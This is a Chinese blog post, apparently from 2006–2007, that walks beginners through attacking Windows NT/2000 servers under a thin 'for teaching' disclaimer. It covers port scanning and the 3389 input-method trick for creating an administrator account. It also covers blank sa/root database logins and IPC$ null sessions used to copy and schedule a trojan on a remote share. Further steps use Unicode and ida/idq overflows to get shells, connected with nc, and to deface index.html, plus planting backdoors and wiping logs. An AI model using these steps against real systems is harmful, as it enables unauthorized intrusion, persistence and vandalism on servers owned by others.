Chinaunix首页 | 论坛 | 博客
  • 博客访问: 621201
  • 博文数量: 139
  • 博客积分: 826
  • 博客等级: 少校
  • 技术积分: 1367
  • 用 户 组: 普通用户
  • 注册时间: 2006-03-25 17:30
文章分类

全部博文(139)

文章存档

2016年(2)

2015年(2)

2014年(1)

2012年(15)

2011年(41)

2007年(33)

2006年(45)

分类: WINDOWS

2007-06-14 22:23:56

WinNT2k服务器一般攻击攻击过程!
2006-12-28 08:54:01
 标签:服务器 

WinNT2k服务器一般攻击攻击过程
本文用于教学!如果非法对他人服务器攻击,一切后果于本人没有关系!
现在WinNT/2k服务器漏洞很多,可以利用的也不少,所以一些新入手的小hacker
就看中了Win这个系统,下面说说,我以前的一些经验心得!高手免看!
首先工具:最好你要有个Nt/2k系统,哪个版本都可以
Super Scanner 一个端口扫描程序,速度很快!
X-scanner 1.3 一个漏洞扫描程序包括了端口扫描,rpc扫描,CGI扫描
简单的密码测试。并且开放了插件接口代码,和可以自己来加一些漏洞资料。
并且支持Tcp/syn不同的扫描方式。
流光,呵呵,还是自己看看吧,很久都没用到哪个东西了。
sunx的 iis5hack.exe (.printf溢出)idahack.exe (.ida溢出)
snake的 idq溢出
netcat.exe 也就是 nc.exe 大家都知道了吧!
一个3389客户端,可以单独分离出来。
Fontpage2000,有的时候这个也可以做为工具使用
其他的,ndde.exe,和一些shellcode,这些,我们做为下篇介绍。
sqlexec.exe 有的时候这个东西也很有用!
---------------------------------------------------------------------
1,扫描!
端口扫描,一般来说,对我们有用的端口 21,23,25,80,138/139.3389,79,1433,3306.....
也有的是木马开的端口和其他的服务,并且端口也可以更改!
以前有个3389,也就是输入法漏洞,呵呵,做肉鸡挺不错的,但现在很少了~~55
Super scanner 对台湾的地址进行扫描中,端口选择3389
然后用3389客户端进行连接后,点id的时候,把输入法点出来,然后点帮助里,
->输入法入门,后点鼠标左键,看到一个小的windows了吗。
然后我们选择
c:winntsystem32 找到net.exe这个文件没有,找到后,然后创建
一个快捷方式,修改属性net.exe user hacker q1w2e3 /add 后运行,当然,没什么
反映,然后同样的方法net.exe localgroup administrators hacker /add,运行后,然后你就可以
登陆这个系统了。然后都是同一过程,放后门,kill log
或可以用上次我看到黑白发表的一篇文章,写到,到哪个小窗口的时候,我们可以写上一个ncx.exe或其他木马后门之类的软件,但不要是压缩过的,然后我们运行后....直接可以telnet ip port!
23,25端口 telnet 23 or 25 我记得以前版本的sendmail
有个bug可以把passwd发到你指定的mail里,现在呢?很少了。。。
也可以来试着猜用户名和密码。。。。呵呵,但这样的人不是很多哦。 其实,可以用来做匿名邮件服务器使用.具体方法在下部介绍
79端口,我们可以了解一些用户的信息。
finger 0
得到用户信息后,可以用一些ftp破解或简单用户密码猜测或letmain(好象是这个软件吧)
80 呵呵,其实不光是做http服务来使用,可以作为端口重定向来使用,可以饶开防火墙(但不完全)呵呵,但稳定性不是很好的bingcheng 的站点 上有这个软件!
其实我们用的最多的就是80口上进行cgi/iis漏洞进行扫描!
1433,mssql服务,有个sa的用户,密码为""
然后可以利用 sql连接工具连接
 net user hack 234 /add
..................
然后net start看一下开了什么服务!
当然你也可以开启他的telnet ,3389或可以停止什么服务
具体请看net help
3306 mysql,有个root用户.密码空.
需要mysql客户端连接入.然后可以自己来编写些很小的语句就可以
做到你想做的事情.
常见的可以很好的利用的一些:
Unicode/2次解码漏洞
idq/ida
Phf漏洞
.printf
FrontPage扩展漏洞 ………
具体请看cgi/iis漏洞资料表
139 NETBIOS信息泄露,有可能可以使用ipc$空连接,或可以使用流光等工具进行简单用户密码猜测等.
C:>net use \ ipc$ “” /user:”” 建立空连接
C:>net view \ 查看文件的共享
C:>net use \ 建立一个连接通道
C:>dir \ 显示远程服务器文件
C:>net time \ 取得远程服务器时间
C:>copy svr.exe \ 复制木马到远程服务器的c$中
C:> at time \ 指定时间运行
下面说说一些常见的漏洞进行攻击!
Unicode/2次解码漏洞:
这个东西很古老了,但是前段时间的redcode/bulecode就是用的这个漏洞进行传播!
一般的就是用ie来作为攻击软件,把cmd.exe换名后,可以 使用ftp调用脚本的方法
或tftp来把木马或其他东西放到对方服务器中运行.sunx有个dll文件可以很容易的作到而且可以利用这个东西得到admin或对付一些ids.()有详细资料.
或可以使用echo命令来写一些东西,最经典的就是root.exe?/c+echo hacker by F-king>c:inetpubwwwrootindex.html
. fontpage 扩展漏洞,可以使用fontpage作为工具登陆到服务器修改站点文件!
.printf是一个iis中映射问题,只要不使用远程打印服务的话。就可以删除
用iis5hack就可以得到一个shell,但时间不是很长,建立一个用户的时间道够了
.idq snake有个溢出程序,gui版本的好用一点,但老是dos!
.ida sunx 有个溢出程序.效果还不错!10次成功一次就不错了。呵呵
:idahack 80 指定sp 1 然后是shellport 我一般喜欢99-)
然后nc –vv 99 或telnet 99
idq基本使用一样.
---------------
入门2技巧:
看到一个站点后,telnet ip 80一下,然后看看返回值就知道什么服务器了.
比如,我不想开扫描软件,想知道有什么服务

.ida
.htr
.htw
msadcs.dll 有个mdac.pl的脚本可以导致攻击者远程执行你系统的命令
......然后出现了什么,如果有这样的情况出现,我想哪个服务器
因该不是很安全的吧!
阅读(1281) | 评论(0) | 转发(0) |
给主人留下些什么吧!~~